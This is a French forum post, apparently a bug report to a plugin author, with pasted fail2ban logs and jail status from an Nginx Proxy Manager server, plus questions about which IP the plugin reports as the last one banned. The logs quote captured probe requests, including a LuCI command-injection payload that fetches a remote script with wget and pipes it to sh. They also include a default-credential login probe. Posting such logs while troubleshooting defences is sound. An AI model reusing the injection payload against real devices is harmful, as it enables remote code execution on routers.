Bonjour Mips
De nouvelles adresses IP ont été bannies, voici:
J’ai affiché l’équipement NginxManager sur lequel 1 seul jail est paramétré pour plus de simplicité.
La page santé :
Configuration du plugin:
Equipements:

Equipement Nginx Manager:
Commandes de l’équipement Nginx Manager:
Il n’y a pas eu d’autres messages après désactivation et réactivation du pluging le 21/12.
Fail2ban de Nginx Manager :
Part.1
2024-12-20 21:12:20,131 fail2ban.filter [7803]: INFO [npm-docker] Found 222.106.242.167 - 2024-12-20 21:12:20
2024-12-21 02:15:27,282 fail2ban.filter [7803]: INFO [npm-docker] Found 47.129.36.118 - 2024-12-21 02:15:27
2024-12-21 07:54:52,058 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,059 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,063 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,070 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,078 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,084 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,090 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,097 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,105 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,112 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,119 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,126 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,132 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,138 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,144 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,151 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,158 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,164 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,170 fail2ban.filter [7803]: INFO [npm-docker] Found 84.17.60.71 - 2024-12-21 07:54:52
2024-12-21 07:54:52,329 fail2ban.actions [7803]: NOTICE [npm-docker] Ban 84.17.60.71
2024-12-21 12:59:58,858 fail2ban.filter [7803]: INFO [npm-docker] Found 35.216.172.135 - 2024-12-21 12:59:58
2024-12-21 12:59:59,213 fail2ban.filter [7803]: INFO [npm-docker] Found 35.216.172.135 - 2024-12-21 12:59:59
2024-12-21 12:59:59,510 fail2ban.filter [7803]: INFO [npm-docker] Found 35.216.172.135 - 2024-12-21 12:59:59
2024-12-21 12:59:59,754 fail2ban.filter [7803]: INFO [npm-docker] Found 35.216.172.135 - 2024-12-21 12:59:59
2024-12-21 12:59:59,908 fail2ban.actions [7803]: NOTICE [npm-docker] Ban 35.216.172.135
2024-12-21 15:28:19,374 fail2ban.filter [7803]: INFO [sshd] Found 192.168.1.132 - 2024-12-21 15:28:18
2024-12-21 18:05:13,705 fail2ban.filter [7803]: INFO [npm-docker] Found 180.76.184.14 - 2024-12-21 18:05:13
2024-12-21 18:32:06,660 fail2ban.filter [7803]: WARNING [npm-docker] Detected a log entry 1h before the current time in operation mode. This looks like a timezone problem. Treating such entries as if they just happened.
2024-12-21 18:32:06,661 fail2ban.filter [7803]: WARNING [npm-docker] Please check a jail for a timing issue. Line with odd timestamp: 2024/12/21 17:32:06 [error] 394#394: *93066 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 59.88.235.97, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0"
2024-12-21 22:48:53,508 fail2ban.filter [7803]: INFO [npm-docker] Found 54.234.30.149 - 2024-12-21 22:48:53
Part.2
2024-12-22 00:00:05,487 fail2ban.server [7803]: INFO rollover performed on /var/log/fail2ban.log
2024-12-22 13:20:52,368 fail2ban.actions [7803]: NOTICE [npm-docker] Unban 109.205.213.230
2024-12-22 15:10:19,822 fail2ban.filter [7803]: INFO [npm-docker] Found 157.245.78.27 - 2024-12-22 15:10:19
2024-12-22 16:47:14,737 fail2ban.filter [7803]: INFO [npm-docker] Found 172.105.246.139 - 2024-12-22 16:47:14
2024-12-22 16:47:15,439 fail2ban.filter [7803]: INFO [npm-docker] Found 172.105.246.139 - 2024-12-22 16:47:15
2024-12-22 16:47:17,253 fail2ban.filter [7803]: INFO [npm-docker] Found 172.105.246.139 - 2024-12-22 16:47:17
2024-12-22 16:47:17,359 fail2ban.actions [7803]: NOTICE [npm-docker] Ban 172.105.246.139
2024-12-22 17:43:41,063 fail2ban.filter [7803]: INFO [npm-docker] Found 198.7.125.59 - 2024-12-22 17:43:41
2024-12-22 18:48:40,026 fail2ban.filter [7803]: WARNING [npm-docker] Detected a log entry 1h before the current time in operation mode. This looks like a timezone problem. Treating such entries as if they just happened.
2024-12-22 18:48:40,027 fail2ban.filter [7803]: WARNING [npm-docker] Please check a jail for a timing issue. Line with odd timestamp: 2024/12/22 17:48:40 [error] 421#421: *113388 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 31.220.1.144, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1", host: "82.65.95.75:80"
2024-12-22 21:47:21,325 fail2ban.filter [7803]: INFO [npm-docker] Found 185.208.156.160 - 2024-12-22 21:47:20
2024-12-22 22:28:21,146 fail2ban.filter [7803]: INFO [npm-docker] Found 103.102.230.8 - 2024-12-22 22:28:21
2024-12-23 11:39:31,191 fail2ban.transmitter [7803]: ERROR Command ['npm-docker'] has failed. Received Exception('Invalid command')
2024-12-23 15:42:13,569 fail2ban.filter [7803]: INFO [npm-docker] Found 4.151.38.184 - 2024-12-23 15:42:13
2024-12-23 16:20:47,085 fail2ban.filter [7803]: INFO [npm-docker] Found 4.213.162.155 - 2024-12-23 16:20:47
root@NginxManager:/var/log# fail2ban-client status npm-docker
Status for the jail: npm-docker
|- Filter
| |- Currently failed: 1
| |- Total failed: 60
| `- File list: /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-2_error.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-4_access.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-4_error.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-2_access.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-3_access.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-1_error.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-1_access.log /home/dom/docker/nginx-proxy-manager/data/logs/proxy-host-3_error.log /home/dom/docker/nginx-proxy-manager/data/logs/fallback_access.log /home/dom/docker/nginx-proxy-manager/data/logs/fallback_error.log
`- Actions
|- Currently banned: 4
|- Total banned: 5
`- Banned IP list: 38.106.31.252 84.17.60.71 35.216.172.135 172.105.246.139
root@NginxManager:/var/log#
Remarque concernant la commande « Dernière IP bannie npm-docker »:
La dernière ip bannie dans le journal fail2ban.log est : 172.105.246.139.
L’ip bannie la plus vieille est : 38.106.31.252
A ta disposition pour d’autres compléments.
Cordialement